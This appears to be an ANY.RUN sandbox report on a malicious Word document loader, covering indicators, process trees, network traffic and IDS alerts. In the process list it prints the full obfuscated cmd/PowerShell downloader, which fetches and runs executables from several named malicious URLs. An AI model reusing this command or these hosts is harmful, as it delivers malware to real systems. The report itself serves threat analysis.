analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://disejardines.com/AMAZON/Clients/2018-12/

Full analysis: https://app.any.run/tasks/0f98ac28-5a53-47f9-b833-d0cf932d2717
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 18, 2018, 16:12:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
Indicators:
MD5:

9F0A0C0FC104451038FB34C11BA78BC0

SHA1:

1C4EB5632E7B477E5DD3E872DEE451D13183F37E

SHA256:

499DD1440342A2BF8480D15D0D4A396F9A3EEB521DBE3DB7D3933BD66A7F44BE

SSDEEP:

3:N1KaMWpMKN/fmJMeWKXi5K:CaXpMKtmMECK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2432)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2700)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2700)
    • Application was dropped or rewritten from another process

      • 150.exe (PID: 3632)
      • archivesymbol.exe (PID: 3184)
      • 150.exe (PID: 2900)
      • archivesymbol.exe (PID: 3428)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2472)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2472)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • chrome.exe (PID: 2952)
      • WINWORD.EXE (PID: 2700)
    • Creates files in the user directory

      • powershell.exe (PID: 2472)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2472)
      • 150.exe (PID: 2900)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3856)
    • Application launched itself

      • WINWORD.EXE (PID: 2700)
      • 150.exe (PID: 3632)
    • Starts itself from another location

      • 150.exe (PID: 2900)
    • Connects to unusual port

      • archivesymbol.exe (PID: 3428)
  • INFO

    • Reads settings of System Certificates

      • chrome.exe (PID: 2952)
    • Reads Internet Cache Settings

      • chrome.exe (PID: 2952)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3768)
      • WINWORD.EXE (PID: 2700)
    • Application launched itself

      • chrome.exe (PID: 2952)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2700)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
18
Malicious processes
4
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start drop and start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 150.exe no specs 150.exe archivesymbol.exe no specs archivesymbol.exe chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2952"C:\Program Files\Google\Chrome\Application\chrome.exe" http://disejardines.com/AMAZON/Clients/2018-12/C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
3680"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6faf00b0,0x6faf00c0,0x6faf00ccC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
2860"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2956 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
4056"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=944,5456772312341896807,5395057936273480936,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=B8A8C7B2F5500741B8124CA5BCFB289C --mojo-platform-channel-handle=984 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
68.0.3440.106
2360"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=944,5456772312341896807,5395057936273480936,131072 --enable-features=PasswordImport --service-pipe-token=0F4BC4720A531D63647F551D64E586FC --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=0F4BC4720A531D63647F551D64E586FC --renderer-client-id=4 --mojo-platform-channel-handle=1908 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
68.0.3440.106
3244"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=944,5456772312341896807,5395057936273480936,131072 --enable-features=PasswordImport --service-pipe-token=F10CC14BB13F8FFDE0E95EE02F558FC5 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=F10CC14BB13F8FFDE0E95EE02F558FC5 --renderer-client-id=3 --mojo-platform-channel-handle=2144 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
3756"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=944,5456772312341896807,5395057936273480936,131072 --enable-features=PasswordImport --disable-gpu-sandbox --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=D0FA618F5CA4AC481D59874F37ECEECE --mojo-platform-channel-handle=3796 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
2700"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\order_details_file.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEchrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3768"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3856c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
3 397
Read events
2 853
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
17
Text files
63
Unknown types
8

Dropped files

PID
Process
Filename
Type
2952chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\b0fe1608-0ed5-4591-94a2-de546aa99da9.tmp
MD5:
SHA256:
2952chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp
MD5:
SHA256:
2952chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp
MD5:
SHA256:
2952chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\322e5c66-53a9-40f1-b2e2-1764dc66d635.tmp
MD5:
SHA256:
2952chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Versiontext
MD5:C10EBD4DB49249EFC8D112B2920D5F73
SHA256:90A1B994CAFE902F22A88A22C0B6CC9CB5B974BF20F8964406DD7D6C9B8867D1
2952chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.oldtext
MD5:92BE6B127E72365885AD4C3FB6534EE2
SHA256:54302A2573ACC775720E7DB0AD85873276713302B4F72596A8DCC44B01C70E51
2952chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old~RF13a53c.TMPtext
MD5:1AA66EFDB743FB0A8DCC1CD79B0B6542
SHA256:28D56532CCED7375A2A1C7731E57C1A1C2EC1AC9827F3E5BEEE7F8069A5F87DD
2952chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF13a53c.TMPtext
MD5:197882774A7ECEC9046BC48F63189B66
SHA256:27377B0D5F989997C2C3F74ACF163EED44B60631DDAA768F6655D7BE555742B2
2952chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.oldtext
MD5:1AA66EFDB743FB0A8DCC1CD79B0B6542
SHA256:28D56532CCED7375A2A1C7731E57C1A1C2EC1AC9827F3E5BEEE7F8069A5F87DD
2952chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF13a4fd.TMPtext
MD5:92BE6B127E72365885AD4C3FB6534EE2
SHA256:54302A2573ACC775720E7DB0AD85873276713302B4F72596A8DCC44B01C70E51
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
10
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3428
archivesymbol.exe
GET
78.189.21.131:80
http://78.189.21.131/
TR
malicious
2952
chrome.exe
GET
200
192.185.96.220:80
http://disejardines.com/AMAZON/Clients/2018-12/
US
document
116 Kb
suspicious
2472
powershell.exe
GET
301
144.76.122.10:80
http://www.ideenweberei.com/L9NXvhd
DE
html
244 b
malicious
2472
powershell.exe
GET
200
144.76.122.10:80
http://www.ideenweberei.com/L9NXvhd/
DE
executable
124 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2952
chrome.exe
192.185.96.220:80
disejardines.com
CyrusOne LLC
US
suspicious
3428
archivesymbol.exe
213.120.119.231:8443
British Telecommunications PLC
GB
malicious
3428
archivesymbol.exe
78.189.21.131:80
Turk Telekom
TR
malicious
2472
powershell.exe
144.76.122.10:80
www.ideenweberei.com
Hetzner Online GmbH
DE
suspicious
2952
chrome.exe
172.217.168.45:443
accounts.google.com
Google Inc.
US
whitelisted
2952
chrome.exe
216.58.215.227:443
ssl.gstatic.com
Google Inc.
US
whitelisted
2952
chrome.exe
172.217.168.35:443
clientservices.googleapis.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
clientservices.googleapis.com
  • 172.217.168.35
whitelisted
www.gstatic.com
  • 172.217.168.35
whitelisted
disejardines.com
  • 192.185.96.220
suspicious
accounts.google.com
  • 172.217.168.45
shared
ssl.gstatic.com
  • 216.58.215.227
whitelisted
www.ideenweberei.com
  • 144.76.122.10
malicious

Threats

PID
Process
Class
Message
2952
chrome.exe
Potentially Bad Traffic
ET WEB_CLIENT Obfuscated Javascript // ptth
2952
chrome.exe
Potentially Bad Traffic
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
2952
chrome.exe
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
2472
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2472
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2472
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2472
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2472
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info